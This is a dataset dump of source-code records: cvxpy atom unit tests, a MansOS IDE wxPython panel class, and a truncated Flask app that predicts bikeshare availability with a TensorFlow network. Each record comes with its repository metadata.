self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (4, 1))
expr = cp.reshape(expr, (2, 2))
self.assertEqual(expr.shape, (2, 2))
expr = cp.reshape(cp.square(self.x), (1, 2))
self.assertEqual(expr.sign, s.NONNEG)
self.assertEqual(expr.curvature, s.CONVEX)
self.assertEqual(expr.shape, (1, 2))
with self.assertRaises(Exception) as cm:
cp.reshape(self.C, (5, 4))
self.assertEqual(str(cm.exception),
"Invalid reshape dimensions (5, 4).")
# Test C-style reshape.
a = np.arange(10)
A_np = np.reshape(a, (5, 2), order='C')
A_cp = cp.reshape(a, (5, 2), order='C')
self.assertItemsAlmostEqual(A_np, A_cp.value)
X = cp.Variable((5, 2))
prob = cp.Problem(cp.Minimize(0), [X == A_cp])
prob.solve()
self.assertItemsAlmostEqual(A_np, X.value)
a_np = np.reshape(A_np, 10, order='C')
a_cp = cp.reshape(A_cp, 10, order='C')
self.assertItemsAlmostEqual(a_np, a_cp.value)
x = cp.Variable(10)
prob = cp.Problem(cp.Minimize(0), [x == a_cp])
prob.solve()
self.assertItemsAlmostEqual(a_np, x.value)
# Test more complex C-style reshape: matrix to another matrix
b = np.array([
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11],
])
b_reshaped = b.reshape((2, 6), order='C')
X = cp.Variable(b.shape)
X_reshaped = cp.reshape(X, (2, 6), order='C')
prob = cp.Problem(cp.Minimize(0), [X_reshaped == b_reshaped])
prob.solve()
self.assertItemsAlmostEqual(b_reshaped, X_reshaped.value)
self.assertItemsAlmostEqual(b, X.value)
def test_vec(self) -> None:
"""Test the vec atom.
"""
expr = cp.vec(self.C)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (6,))
expr = cp.vec(self.x)
self.assertEqual(expr.shape, (2,))
expr = cp.vec(cp.square(self.a))
self.assertEqual(expr.sign, s.NONNEG)
self.assertEqual(expr.curvature, s.CONVEX)
self.assertEqual(expr.shape, (1,))
def test_diag(self) -> None:
"""Test the diag atom.
"""
expr = cp.diag(self.x)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (2, 2))
expr = cp.diag(self.A)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (2,))
expr = cp.diag(self.x.T)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (2, 2))
psd_matrix = np.array([[1, -1], [-1, 1]])
expr = cp.diag(psd_matrix)
self.assertEqual(expr.sign, s.NONNEG)
self.assertEqual(expr.curvature, s.CONSTANT)
self.assertEqual(expr.shape, (2,))
with self.assertRaises(Exception) as cm:
cp.diag(self.C)
self.assertEqual(str(cm.exception),
"Argument to diag must be a vector or square matrix.")
# Test that diag is PSD
w = np.array([1.0, 2.0])
expr = cp.diag(w)
self.assertTrue(expr.is_psd())
expr = cp.diag(-w)
self.assertTrue(expr.is_nsd())
expr = cp.diag(np.array([1, -1]))
self.assertFalse(expr.is_psd())
self.assertFalse(expr.is_nsd())
def test_trace(self) -> None:
"""Test the trace atom.
"""
expr = cp.trace(self.A)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, tuple())
with self.assertRaises(Exception) as cm:
cp.trace(self.C)
self.assertEqual(str(cm.exception),
"Argument to trace must be a square matrix.")
def test_log1p(self) -> None:
"""Test the log1p atom.
"""
expr = cp.log1p(1)
self.assertEqual(expr.sign, s.NONNEG)
self.assertEqual(expr.curvature, s.CONSTANT)
self.assertEqual(expr.shape, tuple())
expr = cp.log1p(-0.5)
self.assertEqual(expr.sign, s.NONPOS)
def test_upper_tri(self) -> None:
with self.assertRaises(Exception) as cm:
cp.upper_tri(self.C)
self.assertEqual(str(cm.exception),
"Argument to upper_tri must be a square matrix.")
def test_vec_to_upper_tri(self) -> None:
from cvxpy.atoms.affine.upper_tri import vec_to_upper_tri
x = Variable(shape=(3,))
X = vec_to_upper_tri(x)
x.value = np.array([1, 2, 3])
actual = X.value
expect = np.array([[1, 2], [0, 3]])
assert np.allclose(actual, expect)
y = Variable(shape=(1,))
y.value = np.array([4])
Y = vec_to_upper_tri(y, strict=True)
actual = Y.value
expect = np.array([[0, 4], [0, 0]])
assert np.allclose(actual, expect)
A_expect = np.array([[0, 11, 12, 13],
[0, 0, 16, 17],
[0, 0, 0, 21],
[0, 0, 0, 0]])
a = np.array([11, 12, 13, 16, 17, 21])
A_actual = vec_to_upper_tri(a, strict=True).value
assert np.allclose(A_actual, A_expect)
def test_huber(self) -> None:
# Valid.
cp.huber(self.x, 1)
with self.assertRaises(Exception) as cm:
cp.huber(self.x, -1)
self.assertEqual(str(cm.exception),
"M must be a non-negative scalar constant.")
with self.assertRaises(Exception) as cm:
cp.huber(self.x, [1, 1])
self.assertEqual(str(cm.exception),
"M must be a non-negative scalar constant.")
# M parameter.
M = Parameter(nonneg=True)
# Valid.
cp.huber(self.x, M)
M.value = 1
self.assertAlmostEqual(cp.huber(2, M).value, 3)
# Invalid.
M = Parameter(nonpos=True)
with self.assertRaises(Exception) as cm:
cp.huber(self.x, M)
self.assertEqual(str(cm.exception),
"M must be a non-negative scalar constant.")
# Test copy with args=None
atom = cp.huber(self.x, 2)
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
# As get_data() returns a Constant, we have to check the value
self.assertEqual(copy.get_data()[0].value, atom.get_data()[0].value)
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data()[0].value, atom.get_data()[0].value)
def test_sum_largest(self) -> None:
"""Test the sum_largest atom and related atoms.
"""
with self.assertRaises(Exception) as cm:
cp.sum_largest(self.x, -1)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_largest(self.x, 2.4)
self.assertEqual(str(cm.exception),
"First argument must be a square matrix.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_largest(Variable((2, 2)), 2.4)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(ValueError) as cm:
cp.lambda_sum_largest([[1, 2], [3, 4]], 2).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
# Test copy with args=None
atom = cp.sum_largest(self.x, 2)
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with lambda_sum_largest, which is in fact an AddExpression
atom = cp.lambda_sum_largest(Variable((2, 2)), 2)
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
def test_sum_smallest(self) -> None:
"""Test the sum_smallest atom and related atoms.
"""
with self.assertRaises(Exception) as cm:
cp.sum_smallest(self.x, -1)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_smallest(Variable((2, 2)), 2.4)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
def test_index(self) -> None:
"""Test the copy function for index.
"""
# Test copy with args=None
shape = (5, 4)
A = Variable(shape)
atom = A[0:2, 0:1]
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
B = Variable((4, 5))
copy = atom.copy(args=[B])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is B)
self.assertEqual(copy.get_data(), atom.get_data())
def test_bmat(self) -> None:
"""Test the bmat atom.
"""
v_np = np.ones((3, 1))
expr = np.vstack([np.hstack([v_np, v_np]),
np.hstack([np.zeros((2, 1)),
np.array([[1, 2]]).T])])
self.assertEqual(expr.shape, (5, 2))
const = np.vstack([np.hstack([v_np, v_np]),
np.hstack([np.zeros((2, 1)),
np.array([[1, 2]]).T])])
self.assertItemsAlmostEqual(expr, const)
def test_conv(self) -> None:
"""Test the conv atom.
"""
a = np.ones((3, 1))
b = Parameter(2, nonneg=True)
expr = cp.conv(a, b)
assert expr.is_nonneg()
self.assertEqual(expr.shape, (4, 1))
b = Parameter(2, nonpos=True)
expr = cp.conv(a, b)
assert expr.is_nonpos()
with self.assertRaises(Exception) as cm:
cp.conv(self.x, -1)
self.assertEqual(str(cm.exception),
"The first argument to conv must be constant.")
with self.assertRaises(Exception) as cm:
cp.conv([[0, 1], [0, 1]], self.x)
self.assertEqual(str(cm.exception),
"The arguments to conv must resolve to vectors.")
def test_kron(self) -> None:
"""Test the kron atom.
"""
a = np.ones((3, 2))
b = Parameter((2, 1), nonneg=True)
expr = cp.kron(a, b)
assert expr.is_nonneg()
self.assertEqual(expr.shape, (6, 2))
b = Parameter((2, 1), nonpos=True)
expr = cp.kron(a, b)
assert expr.is_nonpos()
with self.assertRaises(Exception) as cm:
cp.kron(self.x, -1)
self.assertEqual(str(cm.exception),
"The first argument to kron must be constant.")
def test_partial_optimize_dcp(self) -> None:
"""Test DCP properties of partial optimize.
"""
# Evaluate the 1-norm in the usual way (i.e., in epigraph form).
dims = 3
x, t = Variable(dims), Variable(dims)
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.curvature, s.CONVEX)
p2 = Problem(cp.Maximize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.curvature, s.CONCAVE)
p2 = Problem(cp.Maximize(cp.square(t[0])), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.is_convex(), False)
self.assertEqual(g.is_concave(), False)
def test_partial_optimize_eval_1norm(self) -> None:
"""Test the partial_optimize atom.
"""
# Evaluate the 1-norm in the usual way (i.e., in epigraph form).
dims = 3
x, t = Variable(dims), Variable(dims)
xval = [-5]*dims
p1 = Problem(cp.Minimize(cp.sum(t)), [-t <= xval, xval <= t])
p1.solve()
# Minimize the 1-norm via partial_optimize.
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
# Minimize the 1-norm using maximize.
p2 = Problem(cp.Maximize(cp.sum(-t)), [-t <= x, x <= t])
g = partial_optimize(p2, opt_vars=[t])
p3 = Problem(cp.Maximize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, -p3.value)
# Try leaving out args.
# Minimize the 1-norm via partial_optimize.
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, opt_vars=[t])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
# Minimize the 1-norm via partial_optimize.
g = partial_optimize(p2, dont_opt_vars=[x])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
with self.assertRaises(Exception) as cm:
g = partial_optimize(p2)
self.assertEqual(str(cm.exception),
"partial_optimize called with neither opt_vars nor dont_opt_vars.")
with self.assertRaises(Exception) as cm:
g = partial_optimize(p2, [], [x])
self.assertEqual(str(cm.exception),
("If opt_vars and new_opt_vars are both specified, "
"they must contain all variables in the problem.")
)
def test_partial_optimize_min_1norm(self) -> None:
# Minimize the 1-norm in the usual way
dims = 3
x, t = Variable(dims), Variable(dims)
p1 = Problem(Minimize(cp.sum(t)), [-t <= x, x <= t])
# Minimize the 1-norm via partial_optimize
g = partial_optimize(p1, [t], [x])
p2 = Problem(Minimize(g))
p2.solve()
p1.solve()
self.assertAlmostEqual(p1.value, p2.value)
def test_partial_optimize_simple_problem(self) -> None:
x, y = Variable(1), Variable(1)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= 3, y >= 4, x >= 5])
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
@unittest.skipUnless(len(INSTALLED_MI_SOLVERS) > 0, 'No mixed-integer solver is installed.')
def test_partial_optimize_special_var(self) -> None:
x, y = Variable(boolean=True), Variable(integer=True)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= 3, y >= 4, x >= 5])
p1.solve(solver=cp.ECOS_BB)
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve(solver=cp.ECOS_BB)
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_special_constr(self) -> None:
x, y = Variable(1), Variable(1)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x + cp.exp(y)), [x+y >= 3, y >= 4, x >= 5])
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(cp.exp(y)), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_params(self) -> None:
"""Test partial optimize with parameters.
"""
x, y = Variable(1), Variable(1)
gamma = Parameter()
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= gamma, y >= 4, x >= 5])
gamma.value = 3
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= gamma, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_numeric_fn(self) -> None:
x, y = Variable(), Variable()
xval = 4
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(y), [xval+y >= 3])
p1.solve()
# Solve the two-stage problem via partial_optimize
constr = [y >= -100]
p2 = Problem(Minimize(y), [x+y >= 3] + constr)
g = partial_optimize(p2, [y], [x])
x.value = xval
y.value = 42
constr[0].dual_variables[0].value = 42
result = g.value
self.assertAlmostEqual(result, p1.value)
self.assertAlmostEqual(y.value, 42)
self.assertAlmostEqual(constr[0].dual_value, 42)
# No variables optimized over.
p2 = Problem(Minimize(y), [x+y >= 3])
g = partial_optimize(p2, [], [x, y])
x.value = xval
y.value = 42
p2.constraints[0].dual_variables[0].value = 42
result = g.value
self.assertAlmostEqual(result, y.value)
self.assertAlmostEqual(y.value, 42)
self.assertAlmostEqual(p2.constraints[0].dual_value, 42)
def test_partial_optimize_stacked(self) -> None:
"""Minimize the 1-norm in the usual way
"""
dims = 3
x = Variable(dims, name='x')
t = Variable(dims, name='t')
p1 = Problem(Minimize(cp.sum(t)), [-t <= x, x <= t])
# Minimize the 1-norm via partial_optimize
g = partial_optimize(p1, [t], [x])
g2 = partial_optimize(Problem(Minimize(g)), [x])
p2 = Problem(Minimize(g2))
p2.solve()
p1.solve()
self.assertAlmostEqual(p1.value, p2.value)
def test_nonnegative_variable(self) -> None:
"""Test the NonNegative Variable class.
"""
x = Variable(nonneg=True)
p = Problem(Minimize(5+x), [x >= 3])
p.solve()
self.assertAlmostEqual(p.value, 8)
self.assertAlmostEqual(x.value, 3)
def test_mixed_norm(self) -> None:
"""Test mixed norm.
"""
y = Variable((5, 5))
obj = Minimize(cp.mixed_norm(y, "inf", 1))
prob = Problem(obj, [y == np.ones((5, 5))])
result = prob.solve()
self.assertAlmostEqual(result, 5)
def test_mat_norms(self) -> None:
"""Test that norm1 and normInf match definition for matrices.
"""
A = np.array([[1, 2], [3, 4]])
print(A)
X = Variable((2, 2))
obj = Minimize(cp.norm(X, 1))
prob = cp.Problem(obj, [X == A])
result = prob.solve()
print(result)
self.assertAlmostEqual(result, cp.norm(A, 1).value, places=3)
obj = Minimize(cp.norm(X, np.inf))
prob = cp.Problem(obj, [X == A])
result = prob.solve()
print(result)
self.assertAlmostEqual(result, cp.norm(A, np.inf).value, places=3)
def test_indicator(self) -> None:
x = cp.Variable()
constraints = [0 <= x, x <= 1]
expr = cp.transforms.indicator(constraints)
x.value = .5
self.assertEqual(expr.value, 0.0)
x.value = 2
self.assertEqual(expr.value, np.inf)
def test_log_det(self) -> None:
# test malformed input
with self.assertRaises(ValueError) as cm:
cp.log_det([[1, 2], [3, 4]]).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
def test_lambda_max(self) -> None:
with self.assertRaises(ValueError) as cm:
cp.lambda_max([[1, 2], [3, 4]]).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
def test_diff(self) -> None:
"""Test the diff atom.
"""
A = cp.Variable((20, 10))
B = np.zeros((20, 10))
self.assertEqual(cp.diff(A, axis=0).shape,
np.diff(B, axis=0).shape)
self.assertEqual(cp.diff(A, axis=1).shape,
np.diff(B, axis=1).shape)
def test_log_normcdf(self) -> None:
self.assertEqual(cp.log_normcdf(self.x).sign, s.NONPOS)
self.assertEqual(cp.log_normcdf(self.x).curvature, s.CONCAVE)
for x in range(-4, 5):
self.assertAlmostEqual(
np.log(scipy.stats.norm.cdf(x)),
cp.log_normcdf(x).value,
places=None,
delta=1e-2,
)
y = Variable((2, 2))
obj = Minimize(cp.sum(-cp.log_normcdf(y)))
prob = Problem(obj, [y == 2])
result = prob.solve()
self.assertAlmostEqual(
-result, 4 * np.log(scipy.stats.norm.cdf(2)), places=None, delta=1e-2
)
|
en
| 0.76404
|
Copyright 2013 <NAME> Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Unit tests for the atoms module. Test the copy function for AddExpresion class. # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args Test the norm_inf class. # self.assertEqual(atom.name(), "norm_inf(x + y)") Test the norm1 class. # self.assertEqual(atom.name(), "norm1(x + y)") Test that list input is rejected. Test quad_form atom. Test the power class. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args # Test the geo_mean class. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args # Test the harmonic_mean class. # Test the pnorm class. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args Matrix 1-norm, 2-norm (sigma_max), infinity-norm, Frobenius norm, and nuclear-norm. # Test quad_over_lin DCP. # Test quad_over_lin shape validation. Test arg count for max and min variants. Test for the matrix_frac atom. # Test matrix_frac shape validation. Test max. # One arg, test sign. # Test with axis argument. # Invalid axis. Test min. # One arg, test sign. # Test with axis argument. # Invalid axis. # Test sign logic for maximum. # Two args. # Many args. # Promotion. # Test sign logic for minimum. # Two args. # Many args. # Promotion. Test the sum atom. # Mixed curvature. # Test with axis argument. # Invalid axis. Test the multiply atom. # Test promotion. # Test the vstack class. # self.assertEqual(atom[1,0].name(), "vstack(x[0,0], x[1,0])[1,0]") Test the reshape class. # Test C-style reshape. # Test more complex C-style reshape: matrix to another matrix Test the vec atom. Test the diag atom. # Test that diag is PSD Test the trace atom. Test the log1p atom. # Valid. # M parameter. # Valid. # Invalid. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # As get_data() returns a Constant, we have to check the value # Test copy with new args Test the sum_largest atom and related atoms. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args # Test copy with lambda_sum_largest, which is in fact an AddExpression Test the sum_smallest atom and related atoms. Test the copy function for index. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args Test the bmat atom. Test the conv atom. Test the kron atom. Test DCP properties of partial optimize. # Evaluate the 1-norm in the usual way (i.e., in epigraph form). Test the partial_optimize atom. # Evaluate the 1-norm in the usual way (i.e., in epigraph form). # Minimize the 1-norm via partial_optimize. # Minimize the 1-norm using maximize. # Try leaving out args. # Minimize the 1-norm via partial_optimize. # Minimize the 1-norm via partial_optimize. # Minimize the 1-norm in the usual way # Minimize the 1-norm via partial_optimize # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize Test partial optimize with parameters. # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize # No variables optimized over. Minimize the 1-norm in the usual way # Minimize the 1-norm via partial_optimize Test the NonNegative Variable class. Test mixed norm. Test that norm1 and normInf match definition for matrices. # test malformed input Test the diff atom.
| 1.899299
| 2
|
tools/IDE/src/output_tools.py
|
zxpower/MansOS
| 10
|
6628527
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2008-2012 the MansOS team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import wx
class OutputTools(wx.Notebook):
def __init__(self, parent, API):
#wx.Notebook.__init__(self, parent)
self.API = API
#self.SetBackgroundColour("White")
def addTools(self):
self.API.infoArea.Reparent(self.API.frame)
self.API.frame.auiManager.AddPane(self.API.infoArea, self.API.frame.bottomPane)
self.API.listenModule.Reparent(self.API.frame)
self.API.frame.auiManager.AddPane(self.API.listenModule, self.API.frame.bottomPane)
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2008-2012 the MansOS team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import wx
class OutputTools(wx.Notebook):
def __init__(self, parent, API):
#wx.Notebook.__init__(self, parent)
self.API = API
#self.SetBackgroundColour("White")
def addTools(self):
self.API.infoArea.Reparent(self.API.frame)
self.API.frame.auiManager.AddPane(self.API.infoArea, self.API.frame.bottomPane)
self.API.listenModule.Reparent(self.API.frame)
self.API.frame.auiManager.AddPane(self.API.listenModule, self.API.frame.bottomPane)
|
en
| 0.658356
|
# -*- coding: utf-8 -*- # # Copyright (c) 2008-2012 the MansOS team. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # #wx.Notebook.__init__(self, parent) #self.SetBackgroundColour("White")
| 1.319342
| 1
|
flaskapp/app.py
|
anshgandhi/Predicting_Capital_Bikeshare_bike_availability_realtime
| 0
|
6628528
|
from flask import Flask, flash, redirect, render_template, request, session, abort
app = Flask(__name__)
@app.route("/")
def hello():
stat = []
with open('./stations.csv', 'r') as f:
temp = f.readlines()
for i in temp:
stat.append(i.strip().split(","))
return render_template('results.html',hours=list(range(24)),minutes=["{:02d}".format(i) for i in list(range(0,59,5))],stations=stat)
@app.route("/send",methods=['POST'])
def send():
form_vals = ["hour","minute","station"]
_,month,date = request.form["date_time"].split("-")
month=int(month)
date = int(date)
hour = int(request.form["hour"])
minute = int(request.form["minute"])
stat_id = int(request.form["station"])
stat = []
with open('./stations.csv', 'r') as f:
temp = f.readlines()
for i in temp:
stat.append(i.strip().split(","))
for i,j in enumerate(stat):
if(int(j[1])==stat_id):
cap = stat[i][2]
import tensorflow as tf
from tensorflow.python.framework import ops
import pickle
ops.reset_default_graph()
training_epochs = 1000
batch_size = 64
n_input = 6
n_classes = 1
n_hidden_1 = 6
n_hidden_2 = 2
weights = {
'h1': tf.Variable(pickle.load(open("./../weights/h1.p", "rb"))),
'h2': tf.Variable(pickle.load(open("./../weights/h2.p", "rb"))),
'out': tf.Variable(pickle.load(open("./../weights/hout.p", "rb")))
}
biases = {
'b1': tf.Variable(pickle.load(open("./../weights/b1.p", "rb"))),
'b2': tf.Variable(pickle.load(open("./../weights/b2.p", "rb"))),
'out': tf.Variable(pickle.load(open("./../weights/bout.p", "rb")))
}
#keep_prob = tf.placeholder("float")
x = tf.placeholder("float", [None, n_input])
y = tf.placeholder("float", [None, n_classes])
layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
layer_1 = tf.nn.sigmoid(layer_1)
layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
layer_2 = tf.nn.sigmoid(layer_2)
out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
cost = tf.reduce_mean(tf.squared_difference(y,out_layer))
optimizer = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(cost)
import numpy as np
X = np.array([month,date,hour,minute,stat_id,cap]).reshape(-1,6)
with tf.Session() as sess:
